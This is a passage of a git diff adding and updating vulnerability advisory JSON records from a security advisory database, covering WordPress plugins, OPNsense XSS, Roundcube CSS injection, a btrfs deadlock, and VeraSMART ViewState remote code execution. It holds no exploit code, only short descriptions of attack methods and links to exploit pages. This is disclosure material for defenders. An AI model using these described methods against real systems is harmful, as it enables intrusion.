"id": "GHSA-prgq-3hfx-hfpx", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1833" + ], + "details": "The WaMate Confirm – Order Confirmation plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to block and unblock phone numbers, which should be restricted to administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1833" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/tags/2.0.1/customnotification.php#L1579" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/tags/2.0.1/customnotification.php#L1596" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/trunk/customnotification.php#L1579" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/trunk/customnotification.php#L1596" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9566fdd-c4ad-4971-b23b-bcf76c8b5cef?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prpr-jj7j-2v2f/GHSA-prpr-jj7j-2v2f.json b/advisories/unreviewed/2026/02/GHSA-prpr-jj7j-2v2f/GHSA-prpr-jj7j-2v2f.json new file mode 100644 index 0000000000000..ef779da2805d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prpr-jj7j-2v2f/GHSA-prpr-jj7j-2v2f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prpr-jj7j-2v2f", + "modified": "2026-02-15T15:31:31Z", + "published": "2026-02-15T15:31:31Z", + "aliases": [ + "CVE-2019-25374" + ], + "details": "OPNsense 19.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by exploiting the passthrough_networks parameter in vpn_ipsec_settings.php. Attackers can craft POST requests with JavaScript payloads in the passthrough_networks parameter to execute arbitrary code in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25374" + }, + { + "type": "WEB", + "url": "https://forum.opnsense.org/index.php?topic=11469.0" + }, + { + "type": "WEB", + "url": "https://opnsense.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46351" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/opnsense-reflected-xss-via-vpnipsecsettingsphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json b/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json index 3ab23ebfedbc0..83a8d81a00ee7 100644 --- a/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json +++ b/advisories/unreviewed/2026/02/GHSA-pvgq-2pr4-wxj6/GHSA-pvgq-2pr4-wxj6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pvgq-2pr4-wxj6", - "modified": "2026-02-04T18:30:31Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2025-70758" ], "details": "chetans9 core-php-admin-panel through commit a94a780d6 contains an authentication bypass vulnerability in includes/auth_validate.php. The application sends an HTTP redirect via header(Location:login.php) when a user is not authenticated but fails to call exit() afterward. This allows remote unauthenticated attackers to access protected pages.customer database.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-703" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-03T18:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json b/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json new file mode 100644 index 0000000000000..5c12bac79e333 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw24-qgf8-7qm8", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26079" + ], + "details": "Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13 allows Cascading Style Sheets (CSS) injection, e.g., because comments are mishandled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26079" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/1f4c3a5af5033747f9685a8a395dbd8228d19816" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/2b5625f1d2ef7e050fd1ae481b2a52dc35466447" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/53d75d5dfebef235a344d476b900c20c12d52b01" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/5a3315cce587e0be58335d11ff9a5571c90494a5" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/bf89cbaa5897d8ad62e8057d9a3f6babb90b7954" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/c15f5dbf093a497e19a749b20e7f8fb5a9c24cde" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/releases/tag/1.5.13" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/releases/tag/1.6.13" + }, + { + "type": "WEB", + "url": "https://roundcube.net/news/2026/02/08/security-updates-1.6.13-and-1.5.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw2v-cmfh-x2p3/GHSA-pw2v-cmfh-x2p3.json b/advisories/unreviewed/2026/02/GHSA-pw2v-cmfh-x2p3/GHSA-pw2v-cmfh-x2p3.json new file mode 100644 index 0000000000000..f908e3f6f56ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw2v-cmfh-x2p3/GHSA-pw2v-cmfh-x2p3.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw2v-cmfh-x2p3", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23157" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: do not strictly require dirty metadata threshold for metadata writepages\n\n[BUG]\nThere is an internal report that over 1000 processes are\nwaiting at the io_schedule_timeout() of balance_dirty_pages(), causing\na system hang and trigger a kernel coredump.\n\nThe kernel is v6.4 kernel based, but the root problem still applies to\nany upstream kernel before v6.18.\n\n[CAUSE]\nFrom Jan Kara for his wisdom on the dirty page balance behavior first.\n\n This cgroup dirty limit was what was actually playing the role here\n because the cgroup had only a small amount of memory and so the dirty\n limit for it was something like 16MB.\n\n Dirty throttling is responsible for enforcing that nobody can dirty\n (significantly) more dirty memory than there's dirty limit. Thus when\n a task is dirtying pages it periodically enters into balance_dirty_pages()\n and we let it sleep there to slow down the dirtying.\n\n When the system is over dirty limit already (either globally or within\n a cgroup of the running task), we will not let the task exit from\n balance_dirty_pages() until the number of dirty pages drops below the\n limit.\n\n So in this particular case, as I already mentioned, there was a cgroup\n with relatively small amount of memory and as a result with dirty limit\n set at 16MB. A task from that cgroup has dirtied about 28MB worth of\n pages in btrfs btree inode and these were practically the only dirty\n pages in that cgroup.\n\nSo that means the only way to reduce the dirty pages of that cgroup is\nto writeback the dirty pages of btrfs btree inode, and only after that\nthose processes can exit balance_dirty_pages().\n\nNow back to the btrfs part, btree_writepages() is responsible for\nwriting back dirty btree inode pages.\n\nThe problem here is, there is a btrfs internal threshold that if the\nbtree inode's dirty bytes are below the 32M threshold, it will not\ndo any writeback.\n\nThis behavior is to batch as much metadata as possible so we won't write\nback those tree blocks and then later re-COW them again for another\nmodification.\n\nThis internal 32MiB is higher than the existing dirty page size (28MiB),\nmeaning no writeback will happen, causing a deadlock between btrfs and\ncgroup:\n\n- Btrfs doesn't want to write back btree inode until more dirty pages\n\n- Cgroup/MM doesn't want more dirty pages for btrfs btree inode\n Thus any process touching that btree inode is put into sleep until\n the number of dirty pages is reduced.\n\nThanks Jan Kara a lot for the analysis of the root cause.\n\n[ENHANCEMENT]\nSince kernel commit b55102826d7d (\"btrfs: set AS_KERNEL_FILE on the\nbtree_inode\"), btrfs btree inode pages will only be charged to the root\ncgroup which should have a much larger limit than btrfs' 32MiB\nthreshold.\nSo it should not affect newer kernels.\n\nBut for all current LTS kernels, they are all affected by this problem,\nand backporting the whole AS_KERNEL_FILE may not be a good idea.\n\nEven for newer kernels I still think it's a good idea to get\nrid of the internal threshold at btree_writepages(), since for most cases\ncgroup/MM has a better view of full system memory usage than btrfs' fixed\nthreshold.\n\nFor internal callers using btrfs_btree_balance_dirty() since that\nfunction is already doing internal threshold check, we don't need to\nbother them.\n\nBut for external callers of btree_writepages(), just respect their\nrequests and write back whatever they want, ignoring the internal\nbtrfs threshold to avoid such deadlock on btree inode dirty page\nbalancing.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23157" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4e159150a9a56d66d247f4b5510bed46fe58aa1c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/629666d20c7dcd740e193ec0631fdff035b1f7d6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json b/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json index 23046f808370d..a759b042aefda 100644 --- a/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json +++ b/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pw8j-97jq-cw6g/GHSA-pw8j-97jq-cw6g.json b/advisories/unreviewed/2026/02/GHSA-pw8j-97jq-cw6g/GHSA-pw8j-97jq-cw6g.json new file mode 100644 index 0000000000000..34bd357cad150 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw8j-97jq-cw6g/GHSA-pw8j-97jq-cw6g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw8j-97jq-cw6g", + "modified": "2026-02-13T21:31:40Z", + "published": "2026-02-13T21:31:40Z", + "aliases": [ + "CVE-2026-26335" + ], + "details": "Calero VeraSMART versions prior to 2022 R1 use static ASP.NET/IIS machineKey values configured for the VeraSMART web application and stored in C:\\\\Program Files (x86)\\\\Veramark\\\\VeraSMART\\\\WebRoot\\\\web.config. An attacker who obtains these keys can craft a valid ASP.NET ViewState payload that passes integrity validation and is accepted by the application, resulting in server-side deserialization and remote code execution in the context of the IIS application.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26335" + }, + { + "type": "WEB", + "url": "https://www.calero.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-321" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T21:16:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json new file mode 100644 index 0000000000000..2a07450d4e15f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px76-q5p2-wfgw", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27057" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Filter Everything penci-filter-everything allows Stored XSS.This issue affects Penci Filter Everything: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27057" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-filter-everything/vulnerability/wordpress-penci-filter-everything-plugin-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json new file mode 100644 index 0000000000000..cb7943fc388a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxhf-qg7h-8x8m", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20644" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20644" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json b/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json new file mode 100644 index 0000000000000..f413d75041d80 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxr8-26wq-vfvp", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-22268" + ], + "details": "Dell PowerProtect Data Manager, version(s) prior to 19.22, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to denial of service of a Dell Enterprise Support connection.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22268" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429778/dsa-2026-046-security-update-for-dell-powerprotect-data-manager-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T10:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxrw-3687-548v/GHSA-pxrw-3687-548v.json b/advisories/unreviewed/2026/02/GHSA-pxrw-3687-548v/GHSA-pxrw-3687-548v.json new file mode 100644 index 0000000000000..5351e2efb850f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxrw-3687-548v/GHSA-pxrw-3687-548v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxrw-3687-548v", + "modified": "2026-02-14T06:30:57Z", + "published": "2026-02-14T06:30:57Z", + "aliases": [ + "CVE-2026-26301" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26301" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q242-7m47-x6fv/GHSA-q242-7m47-x6fv.json b/advisories/unreviewed/2026/02/GHSA-q242-7m47-x6fv/GHSA-q242-7m47-x6fv.json new file mode 100644 index 0000000000000..ac3176c7008a8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q242-7m47-x6fv/GHSA-q242-7m47-x6fv.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q242-7m47-x6fv", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-24518" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24518" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json new file mode 100644 index 0000000000000..76c4dd18a5568 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2q8-xrr4-fqjh", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27059" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Recipe penci-recipe allows DOM-Based XSS.This issue affects Penci Recipe: from n/a through <= 4.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27059" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-recipe/vulnerability/wordpress-penci-recipe-plugin-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json b/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json new file mode 100644 index 0000000000000..f1ac9b74d5223 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3c5-6hmj-6999", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37206" + ], + "details": "ShareAlarmPro contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized registration key. Attackers can generate a 1000-character buffer payload to trigger an application crash when pasted into the registration key field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37206" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47859" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/sharealarmpro-advanced-network-access-control-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json b/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json new file mode 100644 index 0000000000000..39f49badfc06e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3f8-qfx4-gq35", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2025-9062" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in MeCODE Informatics and Engineering Services Ltd. Envanty allows Parameter Injection.This issue affects Envanty: before 1.0.6.  \n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way. \nThe vulnerability was learned to be remediated through reporter information and testing.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9062" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0076" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json new file mode 100644 index 0000000000000..3e77fd03b44d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3vc-646j-prpq", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2025-14349" + ], + "details": "Privilege Defined With Unsafe Actions, Missing Authentication for Critical Function vulnerability in Universal Software Inc. FlexCity/Kiosk allows Accessing Functionality Not Properly Constrained by ACLs, Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14349" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-267" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json b/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json new file mode 100644 index 0000000000000..8a29c22d6589c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q438-w288-p457", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25308" + ], + "details": "Mikogo 5.2.2.150317 contains an unquoted service path vulnerability in the Mikogo-Service Windows service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with LocalSystem privileges by placing executable files in specific path locations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25308" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47510" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/mikogo-mikogo-service-unquoted-service-path" + }, + { + "type": "WEB", + "url": "http://html.tucows.com/preview/518015/Mikogo?q=remote+support" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json b/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json new file mode 100644 index 0000000000000..51eedd3b572da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q466-5h8j-2h26", + "modified": "2026-02-11T15:30:27Z", + "published": 